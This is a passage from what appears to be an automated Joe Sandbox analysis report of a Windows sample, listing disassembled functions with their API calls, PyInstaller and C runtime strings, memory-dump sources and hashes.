                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29217F72A19B8142F720EB61B8817E6A7A4FB88784F800176FE8D4365DDF7CD245C651
                                                                                                                                                                                                                              Function 00007FF7EAD1B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                              • Instruction ID: 8a3ba129aaf0e41bd238301cd0bc4d9668ea0521642bac162b1e70f298d2df74
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD215C30E0964281F655F3319652379D396DF687B0F8146B7D93E476DEDD3CA8808222
                                                                                                                                                                                                                              Function 00007FF7EAD27D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                              • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                              • Instruction ID: 7bd9408958f38dd35ee73b0b19f1becb0e3da1c08a021a71317dd89eae2cf5ae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7311B131A18B4282F760EB12E844329A3A4FB88BF4F840275EA5D87798CF7CD814C721
                                                                                                                                                                                                                              Function 00007FF7EAD08ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD08EFD
                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD08F5A
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD09390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7EAD045F4,00000000,00007FF7EAD01985), ref: 00007FF7EAD093C9
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD08FE5
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD09044
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD09055
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD0906A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                              • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                              • Instruction ID: 13a75050ef9c01607e677343f9a0904565bb5ea5655d81eefebb84b5324e9fba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8241B761A1968281FA30EB61E5803BAB395FB84BC8F840176DF4D5779DDE3CE500C721
                                                                                                                                                                                                                              Function 00007FF7EAD1B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B2D7
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B30D
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B33A
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B34B
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B35C
                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B377
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                              • Instruction ID: 10b2ff77d91ebd9834225588a6c44b9d8dad45fda4d32e8db72292485a5836d3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01114930E0D64282FA58F331964137DD386DF687B0F8446B6E92E476DEDE3CA8518322
                                                                                                                                                                                                                              Function 00007FF7EAD02910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7EAD01B6A), ref: 00007FF7EAD0295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                              • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                              • Instruction ID: ae51f5d1fe83f2c971d4e73fef52d4a43429731f2b0db052b25811b2ee4d1c3f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C31CF22B1968152F720E765A8803E6A395FF887D8F800133FE8D8374DEE7CD14AC621
                                                                                                                                                                                                                              Function 00007FF7EAD02390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                              • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                              • Instruction ID: 7d026c2daf2c81c5c0280fff79927e456b28180bb2e537748e3cb749f588f78a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28316372A19A8189FB20EB21E8553F9A364FF88788F840176EA4D47B5DDF3CD105C721
                                                                                                                                                                                                                              Function 00007FF7EAD02B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7EAD0918F,?,00007FF7EAD03C55), ref: 00007FF7EAD02BA0
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF7EAD02C2A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentMessageProcess
                                                                                                                                                                                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                              • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                              • Instruction ID: da505b91eaedee4c8d100829ab9c4c40a91cdb1d33957f570433fb2b5490e2bc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1721A172708B4142F711EB64F8847EAA3A5FB88784F800136EA8D57659DE3CE245C751
                                                                                                                                                                                                                              Function 00007FF7EAD02710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7EAD01B99), ref: 00007FF7EAD02760
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                              • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                              • Instruction ID: b3653a7480c60acb36a9dd249aad42a1c08dedfdf0c78cfb7d5841418f6292e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2217C72A19B8182F720EB60B8817E6A7A4EB88784F800176FA8D4365DDF7CD1498651
                                                                                                                                                                                                                              Function 00007FF7EAD19A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                              • Instruction ID: 0d68a3035b4517ca4c50f72d4311e48bb8cd06f2c2e59faff72b6f0653c3bdd8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3F0C231B0970681FB10EB20E48437AA320EF55760F940276C66E461ECDF7CE148C331
                                                                                                                                                                                                                              Function 00007FF7EAD29368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction ID: 1f19412b6e179195adf8c0d28e5bfbfa09cfc95307ff25947d789b3e9eedac2b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2118232E5CB0301FA78B165E4A13799350EF59360E840EB6EA6E163DECE7C6942C132
                                                                                                                                                                                                                              Function 00007FF7EAD1B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF7EAD1A5A3,?,?,00000000,00007FF7EAD1A83E,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1B3AF
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD1A5A3,?,?,00000000,00007FF7EAD1A83E,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1B3CE
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD1A5A3,?,?,00000000,00007FF7EAD1A83E,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1B3F6
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD1A5A3,?,?,00000000,00007FF7EAD1A83E,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1B407
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD1A5A3,?,?,00000000,00007FF7EAD1A83E,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1B418
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                              • Instruction ID: 2b94987a55666d7648b7d66308c2c78518f251fa95b715d1dc404e7d8e5d04f9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0611FE20F0964241FA54F735A551379D395DF647B0FC882B7D92D476DEDD3CA8418222
                                                                                                                                                                                                                              Function 00007FF7EAD1B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                              • Instruction ID: d973e7f787f7056620904f9625f94c61a3d09728259864a0b272a578929d0dd1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1011F520E0960741FA58F27155523BE9382DF6A330F8847B7D92E4A6DADD3CB8445233
                                                                                                                                                                                                                              Function 00007FF7EAD15FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
